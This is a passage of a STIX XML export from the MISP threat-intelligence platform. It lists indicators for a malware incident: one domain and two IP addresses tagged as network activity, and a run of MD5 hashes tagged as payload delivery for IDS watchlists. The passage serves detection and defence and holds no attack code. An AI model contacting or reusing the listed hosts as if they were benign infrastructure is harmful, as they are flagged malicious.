<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba833-4eb8-4589-ad6e-497a8e96ca05" timestamp="2016-11-03T17:12:19+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: tenday.mysecondarydns.com (MISP Attribute #49)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: tenday.mysecondarydns.com (MISP Attribute #49)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba833-4eb8-4589-ad6e-497a8e96ca05">
<cybox:Object id=":DomainName-581ba833-4eb8-4589-ad6e-497a8e96ca05">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">tenday.mysecondarydns.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:12:19+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba849-3730-4528-a94e-49798e96ca05" timestamp="2016-11-10T15:54:41+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: 59.188.12.123 (MISP Attribute #50)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">IP Watchlist</indicator:Type>
<indicator:Description>Network activity: 59.188.12.123 (MISP Attribute #50)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba849-3730-4528-a94e-49798e96ca05">
<cybox:Object id=":Address-581ba849-3730-4528-a94e-49798e96ca05">
<cybox:Properties xsi:type="AddressObj:AddressObjectType" category="ipv4-addr" is_source="false">
<AddressObj:Address_Value condition="Equals">59.188.12.123</AddressObj:Address_Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T15:54:41+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba849-a850-4cbf-a6b2-49798e96ca05" timestamp="2016-11-10T15:54:32+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: 210.61.12.153 (MISP Attribute #51)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">IP Watchlist</indicator:Type>
<indicator:Description>Network activity: 210.61.12.153 (MISP Attribute #51)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba849-a850-4cbf-a6b2-49798e96ca05">
<cybox:Object id=":Address-581ba849-a850-4cbf-a6b2-49798e96ca05">
<cybox:Properties xsi:type="AddressObj:AddressObjectType" category="ipv4-addr" is_source="false">
<AddressObj:Address_Value condition="Equals">210.61.12.153</AddressObj:Address_Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T15:54:32+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba817-d2a4-4dcb-b1b3-49798e96ca05" timestamp="2016-11-03T17:11:51+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: d579d7a42ff140952da57264614c37bc (MISP Attribute #31)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: d579d7a42ff140952da57264614c37bc (MISP Attribute #31)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba817-d2a4-4dcb-b1b3-49798e96ca05">
<cybox:Object id=":File-581ba817-d2a4-4dcb-b1b3-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">d579d7a42ff140952da57264614c37bc</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:11:51+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba817-1d18-4479-997f-49798e96ca05" timestamp="2016-11-03T17:11:51+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: d8becbd6f188e3fb2c4d23a2d36d137b (MISP Attribute #32)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: d8becbd6f188e3fb2c4d23a2d36d137b (MISP Attribute #32)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba817-1d18-4479-997f-49798e96ca05">
<cybox:Object id=":File-581ba817-1d18-4479-997f-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">d8becbd6f188e3fb2c4d23a2d36d137b</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:11:51+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba817-2ce0-4046-9865-49798e96ca05" timestamp="2016-11-03T17:11:51+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: 09ddd70517cb48a46d9f93644b29c72f (MISP Attribute #33)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: 09ddd70517cb48a46d9f93644b29c72f (MISP Attribute #33)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba817-2ce0-4046-9865-49798e96ca05">
<cybox:Object id=":File-581ba817-2ce0-4046-9865-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">09ddd70517cb48a46d9f93644b29c72f</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:11:51+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba817-91f4-4e92-9164-49798e96ca05" timestamp="2016-11-03T17:11:51+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: f70b295c6a5121b918682310ce0c2165 (MISP Attribute #34)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: f70b295c6a5121b918682310ce0c2165 (MISP Attribute #34)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba817-91f4-4e92-9164-49798e96ca05">
<cybox:Object id=":File-581ba817-91f4-4e92-9164-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">f70b295c6a5121b918682310ce0c2165</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:11:51+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba817-cf4c-42ae-b661-49798e96ca05" timestamp="2016-11-03T17:11:51+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: f80edbb0fcfe7cec17592f61a06e4df2 (MISP Attribute #35)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: f80edbb0fcfe7cec17592f61a06e4df2 (MISP Attribute #35)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba817-cf4c-42ae-b661-49798e96ca05">
<cybox:Object id=":File-581ba817-cf4c-42ae-b661-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">f80edbb0fcfe7cec17592f61a06e4df2</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:11:51+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba817-8d0c-4716-90dc-49798e96ca05" timestamp="2016-11-03T17:11:51+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: d8ede9e6c3a1a30398b0b98130ee3b38 (MISP Attribute #36)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: d8ede9e6c3a1a30398b0b98130ee3b38 (MISP Attribute #36)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba817-8d0c-4716-90dc-49798e96ca05">
<cybox:Object id=":File-581ba817-8d0c-4716-90dc-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">d8ede9e6c3a1a30398b0b98130ee3b38</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:11:51+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba817-5a08-4dff-a2d8-49798e96ca05" timestamp="2016-11-03T17:11:51+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: ce8ec932be16b69ffa06626b3b423395 (MISP Attribute #37)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: ce8ec932be16b69ffa06626b3b423395 (MISP Attribute #37)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba817-5a08-4dff-a2d8-49798e96ca05">
<cybox:Object id=":File-581ba817-5a08-4dff-a2d8-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">ce8ec932be16b69ffa06626b3b423395</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:11:51+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba817-0954-44a7-afce-49798e96ca05" timestamp="2016-11-03T17:11:51+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: 6a541de84074a2c4ff99eb43252d9030 (MISP Attribute #38)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: 6a541de84074a2c4ff99eb43252d9030 (MISP Attribute #38)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba817-0954-44a7-afce-49798e96ca05">
<cybox:Object id=":File-581ba817-0954-44a7-afce-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">6a541de84074a2c4ff99eb43252d9030</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:11:51+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba817-c96c-4e46-bd92-49798e96ca05" timestamp="2016-11-03T17:11:51+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: e0eb981ad6be0bd16246d5d442028687 (MISP Attribute #39)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: e0eb981ad6be0bd16246d5d442028687 (MISP Attribute #39)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba817-c96c-4e46-bd92-49798e96ca05">
<cybox:Object id=":File-581ba817-c96c-4e46-bd92-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">e0eb981ad6be0bd16246d5d442028687</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:11:51+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba817-ad74-4d70-bc5a-49798e96ca05" timestamp="2016-11-03T17:11:51+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: 639c7239f40d95f677a99abb059e8338 (MISP Attribute #40)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: 639c7239f40d95f677a99abb059e8338 (MISP Attribute #40)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba817-ad74-4d70-bc5a-49798e96ca05">
<cybox:Object id=":File-581ba817-ad74-4d70-bc5a-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">639c7239f40d95f677a99abb059e8338</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:11:51+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba817-9adc-4354-9b03-49798e96ca05" timestamp="2016-11-03T17:11:51+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: d07b2738840ce3419df651d3a0a3a246 (MISP Attribute #41)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: d07b2738840ce3419df651d3a0a3a246 (MISP Attribute #41)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba817-9adc-4354-9b03-49798e96ca05">
<cybox:Object id=":File-581ba817-9adc-4354-9b03-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">d07b2738840ce3419df651d3a0a3a246</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:11:51+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba817-8010-4c55-a7c9-49798e96ca05" timestamp="2016-11-03T17:11:51+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: 397021af7c0284c28db65297a6711235 (MISP Attribute #42)</indicator:Title>
